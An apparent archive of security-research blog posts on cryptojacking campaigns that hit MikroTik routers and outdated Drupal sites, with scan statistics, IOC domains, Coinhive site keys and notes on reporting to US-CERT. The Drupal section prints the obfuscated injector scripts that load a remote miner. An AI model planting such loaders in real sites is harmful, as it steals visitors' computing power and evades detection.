200,000+ MikroTik routers worldwide have been compromised to inject cryptojacking malware

Over the last two months, the Bad Packets LLC team has been monitoring over 80 unique cryptojacking campaigns targeting vulnerable MikroTik routers. The latest statistics available from Censys and Shodan confirm hundreds of thousands of devices remain compromised.

These MikroTik routers are being compromised by miscreants exploiting CVE-2018-14847, a critical vulnerability that affects all versions of RouterOS through 6.42. MikroTik issued a patch earlier this year; however, the latest statistics (above) reveal that device owners and network operators have chosen not to apply it.

Ali Mosajjal provides an excellent discussion of this vulnerability and how it’s exploited here. Another post, by Simon Kenin, explains how the first cryptojacking campaigns targeted over 170,000 MikroTik routers in Brazil alone. Kenin described it best when he stated:

“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices.”

Despite the warnings from Mosajjal and Kenin, numerous MikroTik routers worldwide remain compromised. Looking strictly at Coinhive infections alone, we clearly see the unfortunate truth.

However, Coinhive isn’t the only type of cryptojacking malware being injected via these compromised routers. Looking at all the campaigns noted in the MikroTik Cryptojacking Campaigns spreadsheet, we find some interesting contenders.

Coinhive is clearly the dominant choice of miscreants looking for cryptojacking victims.

While Coinhive is used in the vast majority of cryptojacking campaigns, it is not used by the largest campaign. Instead, CoinImp is used in a campaign consisting of 115,000 MikroTik routers, per the latest Censys results. A large share of compromised devices are found on the network of two service providers in Iran, AS59566 and AS56616.

In this campaign, CoinImp is injected via https://srcip[.]com/src.js which embeds an iframe pointing to https://srcip[.]com/js.html which contains the cryptocurrency mining JavaScript code.

CoinImp is injected via https://www.hostingcloud[.]science./M5q5.js
Twitter user @VriesHd raises a good point that despite clear evidence, no AV company has flagged the domain or URL as malicious. Fortunately, users of the CoinBlockerLists are protected as all domains mentioned in this post and the IOC spreadsheet are included.

Another cryptojacking campaign seemingly running rampant was discovered earlier in September.

In this case, the cryptojacking malware appears to be injecting MinerAlt, a service that mines CryptoNight coins (Monero, Electroneum, etc.) while taking a 30% cut of its users’ revenue. Unlike Coinhive’s, the WebSocket traffic is not in plain text (shown in the tweet above).

Infected routers in this campaign are configured to throttle the CPU usage of the victims’ devices in a likely attempt to reduce detection. In the example shown below, the amount of CPU power used for mining cryptocurrency is roughly 80%.

United States cryptojacking campaigns

Looking specifically at compromised MikroTik routers in the United States, a few troubling cryptojacking campaigns were found. On August 25, nearly 3,000 compromised routers with IP addresses assigned to Cogent Communications were located on Censys.

Almost a month later, another surprising cryptojacking campaign was discovered. This new campaign included over 600 MikroTik routers on the network of Douglas County Public Utility District in north central Washington state. Their network, AS27373, has been allocated 1,792 IPv4 addresses and the latest Censys results show 703 IPs consisting solely of MikroTik routers. In other words, 39% of the IPs they manage route to a compromised device.

Upon reviewing these findings, I notified US-CERT (NCCIC) in addition to other members of federal law enforcement, as these routers are on the network of a public energy co-operative. While I never received confirmation that an NCCIC incident number was assigned, I was told by the NCCIC to continue to send in similar reports in the future.

It’s alarming to see so many devices on a public utility’s network compromised, so I hope the NCCIC is able to provide them with guidance and/or assistance with the remediation process.

The latest results found on Censys indicate that cryptojacking campaigns targeting vulnerable MikroTik routers in the United States are not slowing down. Many Wireless Internet Service Providers (WISPs) appear to be affected, as numerous compromised devices can be found on their networks.


Instead of listing each IOC here, I have placed them in the MikroTik cryptojacking campaigns spreadsheet that lists each site key used for every campaign and includes notes on how the malware is injected.

Thanks to Censys for providing me with the API credits needed to keep this list frequently updated.

Closing remarks

As I recently told Threatpost, scraping for pennies with Coinhive is not the worst-case scenario for what miscreants can do with these compromised MikroTik routers. The report published by Netlab 360 illustrated how they can be used for much more nefarious purposes, such as eavesdropping on all traffic passing through them.

MikroTik users need to ensure they’re running the latest version of RouterOS which has patched CVE-2018-14847. Anyone using version 6.42 or older should apply the update ASAP, available here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I’ve also coauthored a peer-reviewed research paper, A first look at browser-based cryptojacking.

As always, I’m most active on Twitter — please follow @bad_packets for the latest updates.

Author’s note

The statistics shared in this post were accurate as of September 28, 2018. Since then, the number of compromised MikroTik routers worldwide has greatly increased. The latest totals reveal over 400,000 have been hacked by miscreants.

How to stop cryptojacking and the theft of your computing resources

Cryptojacking is defined as hijacking your desktop / laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found injected into compromised websites. Some affected sites have belonged to well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.

High CPU usage caused by cryptojacking can be observed using the Task Manager.

Mined hashes are sent via a WebSocket connection to a mining pool or a service provider such as Coinhive. While Coinhive remains the market leader, I previously documented how to find other forms of cryptojacking malware that have grown in popularity.

Coinhive websocket traffic shown in Fiddler.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.


I recommend using MinerBlock to stop cryptojacking in your browser. This is an easy solution which requires no additional configuration out of the box. MinerBlock prevents cryptojacking using two methods: a frequently updated blacklist and detection of JavaScript exhibiting cryptomining behavior. It’s available for Chrome and Firefox, and is open source.


Another effective method is to stop cryptojacking at the network level (firewall), preventing the malicious code from reaching your endpoints. I recommend using the CoinBlockerLists for this purpose. These lists are constantly updated, as new malicious domains are frequently found.

The lists are available in various formats to easily integrate with your existing solution. A FireHOL feed is also available. For macOS users, this guide illustrates how the CoinBlockerLists can be implemented using the firewall software Little Snitch. Other methods, such as DNS filtering using Pi-hole, can also be used with the CoinBlockerLists.

Resource monitoring

As an independent security researcher, I don’t recommend a specific endpoint protection product for enterprises. Many antivirus / antimalware products such as Malwarebytes, ESET, Avast, Kaspersky, and Windows Defender will block most forms of cryptojacking and coinmining malware.

Even with some form of AV protection, resource monitoring of your on-premise and cloud infrastructure is critical. High CPU usage over a sustained period of time is the most apparent indicator of compromise in cases of cryptojacking. Consuming excessive computational resources will increase your cloud service provider bills and energy (electricity) costs.


Personally, I use PRTG for all my monitoring needs. Paessler recently published a case study featuring my use of PRTG to monitor cryptojacking incidents. The impact of resource abuse and theft highlights the importance of monitoring. PRTG is free to use up to 100 sensors and can be downloaded here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I also coauthored a research paper, A first look at browser-based cryptojacking, for further reading on this topic.

As always, I’m most active on Twitter — follow me @bad_packets.

Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)

In my previous post, I detailed a large cryptojacking campaign that affected hundreds of Drupal websites. Multiple campaigns remain active today and are documented further in the latest SecurityTrails report. An important question was raised during my initial investigation — How many Drupal sites are vulnerable?

To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7. I promptly began scanning all the sites to establish which were vulnerable, and which were not.

I regarded sites that were using at least version 7.58 as not vulnerable to Drupalgeddon 2. This critical flaw is detailed in Drupal security advisory SA-CORE-2018-002 and has been assigned CVE-2018-7600.

Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites where I could not ascertain the version used.
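The version check behind these three buckets, as an added example rather than the scanning tool actually used for the post: it sorts a site by the newest release heading in its publicly served CHANGELOG.txt, assuming the stock Drupal 7 layout in which that heading reads like “Drupal 7.58, 2018-03-28”. The three response bodies are constructed, and a version string cannot show whether a mitigation patch was applied on top of an older release.

```javascript
// Added example, not the author's scanner: sort a Drupal 7 site into the three
// buckets above using only the text of its public CHANGELOG.txt. Assumes the stock
// Drupal 7 changelog layout, where the newest release heading comes first and reads
// like "Drupal 7.58, 2018-03-28". The three response bodies below are constructed.

// SA-CORE-2018-002 (CVE-2018-7600) was fixed in Drupal 7.58, the cut-off used in the post.
const FIXED_IN = [7, 58];

// Newest release heading in a Drupal changelog, e.g. "Drupal 7.57, 2018-02-21".
const RELEASE_LINE = /^Drupal (\d+)\.(\d+)\b/m;

// Parse the first release heading into [major, minor]; null if none is present
// (an error page, an install that removed CHANGELOG.txt, or a different CMS).
function parseVersion(body) {
  const m = RELEASE_LINE.exec(body);
  return m ? [Number(m[1]), Number(m[2])] : null;
}

// Numeric, component-wise comparison so that 7.9 sorts below 7.58 (a plain string
// compare would get this wrong). Negative: a < b; zero: equal; positive: a > b.
function compareVersions(a, b) {
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Classify one response body. "vulnerable" here means "outdated per CHANGELOG.txt",
// the same criterion as the post: a site may have applied a mitigation patch without
// changing its version string, and this check cannot see that.
function classifySite(body) {
  if (typeof body !== 'string' || /<html[\s>]/i.test(body)) {
    return { status: 'unknown', version: null }; // HTML error page, no changelog served
  }
  const v = parseVersion(body);
  if (v === null) return { status: 'unknown', version: null };
  const version = `${v[0]}.${v[1]}`;
  if (v[0] !== 7) return { status: 'unknown', version }; // only Drupal 7 is scored here
  const status = compareVersions(v, FIXED_IN) >= 0 ? 'not-vulnerable' : 'vulnerable';
  return { status, version };
}

// Aggregate a batch of bodies into the three counts the post reports.
function tally(bodies) {
  const counts = { vulnerable: 0, 'not-vulnerable': 0, unknown: 0 };
  for (const body of bodies) counts[classifySite(body).status] += 1;
  return counts;
}

// Constructed sample bodies: only the release headings matter to the check, and
// the entries beneath them are placeholders rather than real changelog text.
const SAMPLE_OUTDATED = [
  'Drupal 7.57, 2018-02-21',
  '-----------------------',
  '- (constructed placeholder entry)',
].join('\n');

const SAMPLE_PATCHED = [
  'Drupal 7.59, 2018-04-25',
  '-----------------------',
  '- (constructed placeholder entry)',
  '',
  'Drupal 7.58, 2018-03-28',
  '-----------------------',
  '- (constructed placeholder entry)',
].join('\n');

const SAMPLE_NOT_FOUND =
  '<!DOCTYPE html><html><head><title>Page not found</title></head><body></body></html>';

for (const body of [SAMPLE_OUTDATED, SAMPLE_PATCHED, SAMPLE_NOT_FOUND]) {
  console.log(classifySite(body));
}
console.log(tally([SAMPLE_OUTDATED, SAMPLE_PATCHED, SAMPLE_NOT_FOUND]));
```

Running it on your own site means fetching /CHANGELOG.txt from it and passing the body to classifySite(); an "unknown" result for a Drupal 7 site usually means the file was removed or blocked, which is itself a reasonable hardening step.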

Pie chart of vulnerable Drupal websites found

Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers.

Due to the highly critical risk of CVE-2018-7600 being exploited, the list of 115,070 vulnerable sites won’t be shared publicly. However, the list of sites has been shared with US-CERT and the Drupal Security Team. If you represent a national CERT/CSIRT and can offer assistance notifying affected organizations, please contact me.

Another Drupal cryptojacking campaign discovered

While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.

When the campaign was first discovered, the domain name was using Cloudflare, so the real hosting provider was unknown.

The Coinhive site key used was “ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos” however this was later terminated. Because of this, the cryptojacking campaign operator switched to key “0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd” and resumed operations on the morning of May 31, 2018.

Twelve hours after my initial report, the malicious code was removed from votrepolice.be and upgraderservices[.]cf was dropped by Cloudflare.

Once this was done, the hosting provider was revealed to be OVH. Simultaneously, the domain’s SSL certificate was switched to LetsEncrypt.

Hundreds of compromised Drupal sites found (again)

To locate compromised sites in this cryptojacking campaign, I scanned the nearly half million Drupal sites for upgraderservices[.]cf. Upon completion, 258 sites were found containing a reference to the malicious domain. I’ve created this spreadsheet listing all of the affected websites.

One of the affected sites in this campaign was the website of the Colorado Attorney General’s Office.

Upon the discovery, I reported the site to US-CERT as I previously did for the US federal government sites found in the previous Drupal cryptojacking campaign. An incident number was assigned by the NCCIC Security Operations Center shortly thereafter.

I also set up PRTG monitoring to confirm when the site was remediated. This was done in less than 24 hours after my initial report.

Other websites in the campaign were noticed by Twitter users, including that of a food truck locating service.

Another affected website found was automobile parts manufacturer Magneti Marelli, a subsidiary of Fiat.

One site found in the campaign had upgraded to the latest Drupal version without removing the malicious content. As noted by the Drupal Security Team PSA, “simply updating Drupal will not remove backdoors or fix compromised sites” and further remediation steps are necessary.


Domain / URLs

Coinhive Site Keys

2018-06-07 Update

The Drupal Security Team released a statement regarding my findings that questioned my methodology. While we know 115,000 sites are using outdated Drupal versions, based on the publicly accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did — unless we perform the actual exploit.

Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version of Drupal. Using an outdated content management system (CMS) is never best practice.

Closing Remarks

While the number of vulnerable Drupal websites found is astounding, it’s good to see an even larger share of sites have patched the vulnerability. Hopefully this becomes a trend as more sites continue to be updated.

This latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale. If you’re a website operator using Drupal’s CMS, you need to update to the latest available version ASAP. The Drupal security team has prepared a guide of steps to take if your website has been compromised.

To stop cryptojacking in your browser, I recommend the extension minerBlock. The blocklist provided by CoinBlockerLists is an excellent resource to block coinmining malware and illicit cryptomining operations at the network level.

To learn more about my work and what others are saying about it, please visit this page.

As always, I’m most active on Twitter — follow me @bad_packets

Large cryptojacking campaign targeting vulnerable Drupal websites

Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. After I analysed the IOCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many discovered were government and university sites from all over the world.

Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.

Deobfuscated Coinhive malware
In each case, the malicious code was obfuscated and unreadable to humans.

Once the code was deobfuscated, the reference to “http://vuuwd[.]com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.

Domain used to inject Coinhive malware
The Coinhive implementation has a small throttle configured to prevent 100% CPU usage.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.

After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd[.]com.

While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at hand, vuuwd[.]com.

The historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via mineXMR.com. While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, which takes a 30% cut of all mining proceeds, it was the choice they made.

Now that the IOCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references to the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using a regular expression via PublicWWW’s snipex function.

Once I had the potential list of affected sites, I began scanning them for IOCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.

The big reveal

After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of urlscan.io, it became clear these were all sites running outdated and vulnerable versions of the Drupal content management system.

The affected sites varied by hosting provider and country, and no specific one appeared to be targeted. The largest number of unique domains were found in the United States and were hosted by Amazon.

Unique domains found by country. Unique domains found by hosting provider.

Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.

Government sites affected

The National Labor Relations Board – US federal agency

Government of Chihuahua, Mexico

City of Marion, Ohio

Arizona Board of Behavioral Health Examiners

Social Security Institute of the State of Mexico and Municipalities

Turkish Revenue Administration – Aydın Tax Office

Procalidad – “The Project Improvement of Higher Education Quality” – Peru

Matzikama Municipality

UMBRIA Special Reconstruction Office


University / school sites affected

University of Aleppo

College of Biblical Studies

IOHANES – University of Balamand

Ringling College of Art and Design

Vidyalankar Institute of Technology

University of Batangas

Asia Pacific Institute of Information Technology (APIIT)

Management Development Institute of Singapore in Tashkent

Islamic Azad University of the Semnan branch

Tan Dan Secondary School


Other sites affected

The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to the infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.

2018-05-07 update

Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.

Malicious code found on Lenovo’s portal page.

Websites of UCLA and DLink Brazil were also found injecting Coinhive.

Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency.

For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of a trusted (CA) one. This could have easily (and freely) been done using LetsEncrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.

In addition to the self-signed SSL cert misstep, the reference to the non-secure version is included in some sites, such as the Office of Inspector General of the EEOC. This is yet another blunder that hinders the effectiveness of this cryptojacking campaign, as Coinhive does not load.

2018-05-16 update

This cryptojacking campaign continues as the malware host vuuwd[.]com has been restored with a new Coinhive site key.

The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story.



https://vuuwd[.]com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")

var RqLm1=window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0];var D2=window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74');D2["x74x79x70x65"]='x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74';D2["x69x64"]='x6dx5fx67x5fx61';D2["x73x72x63"]='x68x74x74x70x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73';RqLm1["x61x70x70x65x6ex64x43x68x69x6cx64"](D2);

var dZ1= window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0]; var ZBRnO2= window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74'); ZBRnO2["x74x79x70x65"]= 'x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74'; ZBRnO2["x69x64"]='x6dx5fx67x5fx61';ZBRnO2["x73x72x63"]= 'x68x74x74x70x73x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73'; dZ1["x61x70x70x65x6ex64x43x68x69x6cx64"](ZBRnO2);

;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();
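A way to statically recover the strings hidden in the three snippets above, as an added example that is not part of the original post: it treats the snippets purely as text (nothing is executed or fetched), handles both the hex-escaped property names of the first two loaders and the b()/h() odd-character-then-reverse scheme of the third, and defangs any URL it finds the way this post writes its IOCs. The two sample inputs are constructed from fragments of the quoted snippets.

```javascript
// Added example, not code from the original post: an offline deobfuscator for the
// two string-hiding tricks used by the injected snippets quoted above. The samples
// below are constructed from fragments of those snippets and are only analysed as
// text; nothing here executes the loaders or contacts the domains they reference.

// Trick 1: names and URLs written as hex escapes ("\x64\x6f..." -> "document").
// The copies quoted on this page lost their backslashes ("x64x6f..."), so both
// spellings are accepted. Returns null when the literal is not a pure hex string.
function decodeHexLiteral(lit) {
  if (!/^(\\?x[0-9a-fA-F]{2})+$/.test(lit)) return null;
  return lit.replace(/\\?x([0-9a-fA-F]{2})/g, (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Trick 2: the b()/h() pair from the third snippet. b() keeps only the characters
// at odd indexes (the even ones are junk), then h() reverses what is left.
function decodeOddReverse(enc) {
  let kept = '';
  for (let i = 1; i < enc.length; i += 2) kept += enc[i];
  return kept.split('').reverse().join('');
}

// Walk every quoted literal in a snippet and record how it was hidden:
// a literal passed straight to b(...) gets decodeOddReverse(), a literal made only
// of hex escapes gets decodeHexLiteral(), anything else is kept as-is.
function extractStrings(snippet) {
  const found = [];
  const literal = /(\bb\()?(["'])((?:\\.|(?!\2)[^\\\n])*)\2/g;
  let m;
  while ((m = literal.exec(snippet)) !== null) {
    const raw = m[3];
    const hex = decodeHexLiteral(raw);
    if (hex !== null) found.push({ raw, decoded: hex, method: 'hex' });
    else if (m[1]) found.push({ raw, decoded: decodeOddReverse(raw), method: 'odd-reverse' });
    else found.push({ raw, decoded: raw, method: 'plain' });
  }
  return found;
}

// Defang a URL the way this post writes its IOCs: dots in the host become "[.]".
function defang(url) {
  const m = /^(https?:\/\/)([^\/]+)(.*)$/.exec(url);
  return m ? m[1] + m[2].replace(/\./g, '[.]') + m[3] : url;
}

// The remote script URLs a snippet would load, defanged for safe sharing.
function findUrls(snippet) {
  return extractStrings(snippet)
    .map((s) => s.decoded)
    .filter((s) => /^https?:\/\//.test(s))
    .map(defang);
}

// Constructed sample 1: a trimmed copy of the first loader above (hex-escaped,
// backslashes already stripped exactly as in the quoted copy).
const SAMPLE_HEX = `var D2=window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74');D2["x73x72x63"]='x68x74x74x70x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73';`;

// Constructed sample 2: the fingerprinting checks from the third snippet, which gate
// the loader on the user agent and on an analytics cookie being present.
const SAMPLE_ODD = `var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){w.type='text/javascript';}}`;

for (const sample of [SAMPLE_HEX, SAMPLE_ODD]) {
  for (const s of extractStrings(sample)) {
    console.log(`${s.method.padEnd(11)} ${s.raw}  ->  ${s.decoded}`);
  }
  console.log('script URLs:', findUrls(sample));
}
```

Decoding the second sample shows the loader only runs when the user agent contains "Windows" but not "Android" and the "___utma=" cookie is absent, which is why a quick look in a browser with analytics cookies already set can miss the miner entirely.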


Closing Remarks

We’ve seen plenty of examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website, and you may need to take further remediation steps.

To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.

If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Recent Podcasts: Packet Pushers & The CoinSec Podcast

In the last month, I was invited to participate in two podcasts. The first was with Packet Pushers and the second with The CoinSec Podcast. This was definitely less hectic than doing a live interview on Canadian national television. In both shows, I shared my thoughts on cryptojacking and other security topics.

Packet Pushers Podcast


For the Packet Pushers podcast, I was a guest of Paessler. They are the company behind the enterprise and network monitoring application, PRTG. I’ve frequently mentioned PRTG in my tweets as it’s one of my favorite monitoring tools. One of the notable incidents I always like to reference is the Showtime Networks case. This was the first major case of cryptojacking affecting a well-known website and I was the first to document the incident.

PRTG allows me to monitor any website for Coinhive and other cryptojacking malware. This was valuable when the website of Politifact.com was also compromised. I was able to quickly and easily configure monitoring for the site.

In addition to the HTTP Advanced sensor, I use numerous other sensor types in PRTG including: SNMP, SSH, SSL, WMI, and many others discussed in the Packet Pushers podcast. Tune in to find out my favorites!

If you’re looking for the peer-reviewed research paper mentioned in the show, please visit my Publications page.

The CoinSec Podcast



The second podcast I recorded was with The CoinSec Podcast. This show is about cryptocurrency and blockchain technologies with a focus on securing them. I had a great time discussing cryptojacking and other security issues affecting the cryptocurrency ecosystem.

Closing Remarks

While it’s a little nerve-wracking recording podcasts or television interviews, I always enjoy sharing my thoughts on cryptojacking and other security topics. If you’d like to learn more about my work and what others are saying about it, please see this page.

As always, I’m most active on Twitter – follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!